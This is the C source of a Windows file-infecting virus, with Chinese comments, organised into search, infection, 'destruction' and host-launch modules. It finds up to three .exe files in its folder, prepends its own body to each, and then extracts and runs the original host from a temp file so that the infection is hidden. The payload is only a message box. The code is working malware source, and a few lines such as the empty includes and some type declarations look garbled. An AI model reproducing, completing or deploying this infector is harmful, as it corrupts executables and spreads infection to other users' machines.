#include "stdafx.h"
#include
#include
#include
#include
#include
/*条件模块:
功能:搜索病毒文件所在目录中,规定数目的exe文件
//打开符合条件的文件*/
HANDLE OpenHostFile(const WIN32_FIND_DATA *pHost,DWORD *nCount)//WIN32_FIND_DATA = 保存文件的全部属性信息的结构体,DWORD 双字即为4个字节
{
HANDLE hHost=CreateFile(pHost->cFileName,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
OPEN_EXISTING,
NULL,
NULL);
if(hHost!=INVALID_HANDLE_VALUE)
(*nCount)++;
return hHost;
}
//搜索函数
DWORD FindHostFile(HANDLE szHostFileHandle,DWORD dwFindNumber)
{
DWORD dwResult=0;
WIN32_FIND_DATA fd;
HANDLE hFirst=FindFirstFile(_T(".exe"),&fd);
szHostFileHandle[0]=OpenHostFile(&fd,&dwResult);
while(dwResult<dwFindNumber)
{
DWORD dwTemp=dwResult;
if(FindNextFile(hFirst,&fd))
{
HANDLE hTemp=OpenHostFile(&fd,&dwResult);
if(hTemp != INVALID_HANDLE_VALUE)
szHostFileHandle[dwTemp]=hTemp;
else
break;
}
}
return dwResult;
}
/*感染模块:
功能:将病毒文件注入宿主文件,将原宿主文件向后移动*/
//定义病毒大小,使用全局变量是因为其它模块也要用到,53248是代码在VC2005 Debug模式下的生成文件大小,但并非都是这样,请自行确定,如果大小错误,那么感染后的文件运行会出错。
DWORD dwVirusSize=40960;
//感染模块
void Infect(HANDLE hHostFile,HANDLE hLocalFile)
{
DWORD dwHostSize=GetFileSize(hHostFile,0);
DWORD dwReadSize=0;
DWORD dwWriteSize=0;
char *pLocalTempBuf=(char*)malloc(sizeof(char)*dwVirusSize);
char *pHostTempBuf=(char*)malloc(sizeof(char)*dwHostSize);
ReadFile(hLocalFile,pLocalTempBuf,dwVirusSize,&dwReadSize,NULL);
ReadFile(hHostFile,pHostTempBuf,dwHostSize,&dwReadSize,NULL);
SetFilePointer(hHostFile,0,0,FILE_BEGIN);
WriteFile(hHostFile,pLocalTempBuf,dwVirusSize,&dwWriteSize,NULL);
WriteFile(hHostFile,pHostTempBuf,dwHostSize,&dwWriteSize,NULL);
//清理工作
SetFilePointer(hLocalFile,0,0,FILE_BEGIN);
free(pLocalTempBuf);
free(pHostTempBuf);
}
/*破坏模块:
功能:仅仅打印提示。*/
void Destory()
{
MessageBox(NULL,_T("我保证什么都不做"),_T("Test"),MB_OK);
}
/*宿主程序引导模块
功能:创建临时文件,将所触发的病毒文件的宿主程序写入,然后启动*/
void JumpLocalHostFile(HANDLE hLocalFile)
{
DWORD nCount=0;
DWORD dwLocalFileSize=GetFileSize(hLocalFile,0);
if(dwLocalFileSize==dwVirusSize)
return ;
char pTemp=(char)malloc(sizeof(char)*(dwLocalFileSize-dwVirusSize));
ReadFile(hLocalFile,pTemp,(dwLocalFileSize-dwVirusSize),&nCount,NULL);
TCHAR szLocalPath[MAX_PATH];
TCHAR szTempPath[MAX_PATH];
TCHAR szTempName[50];
GetModuleFileName(NULL,szLocalPath,sizeof(szLocalPath));
GetTempPath(MAX_PATH,szTempPath);
GetFileTitle(szLocalPath,szTempName,50);
wcscat(szTempPath,szTempName);
HANDLE hJumpHost=CreateFile(szTempPath,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_NEW,NULL,NULL);
if(hJumpHost==INVALID_HANDLE_VALUE)
return ;
WriteFile(hJumpHost,pTemp,(dwLocalFileSize-dwVirusSize),&nCount,NULL);
free(pTemp);
CloseHandle(hJumpHost);
PROCESS_INFORMATION information;
STARTUPINFO si = {sizeof(si)};
if(CreateProcess(szTempPath,NULL,
NULL,NULL,
FALSE,NORMAL_PRIORITY_CLASS,
NULL,NULL,
&si,&information))
{
WaitForSingleObject(information.hProcess,INFINITE);
DeleteFile(szTempPath);
}
}
/*5.程序入口*/
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
TCHAR szLocalPath[MAX_PATH];
GetModuleFileName(NULL,szLocalPath,sizeof(szLocalPath));
HANDLE hLocalFileHandle=CreateFile(szLocalPath,
GENERIC_READ,
FILE_SHARE_READ,
0,
OPEN_EXISTING,
NULL,
NULL);
HANDLE szHostHandle[3];
DWORD dwFoundFileNumber=FindHostFile(szHostHandle,3);
Destory();
for(DWORD i=0;i<dwFoundFileNumber;i++)
{
Infect(szHostHandle[i],hLocalFileHandle);
CloseHandle(szHostHandle[i]);
}
JumpLocalHostFile(hLocalFileHandle);
CloseHandle(hLocalFileHandle);
return 0;
}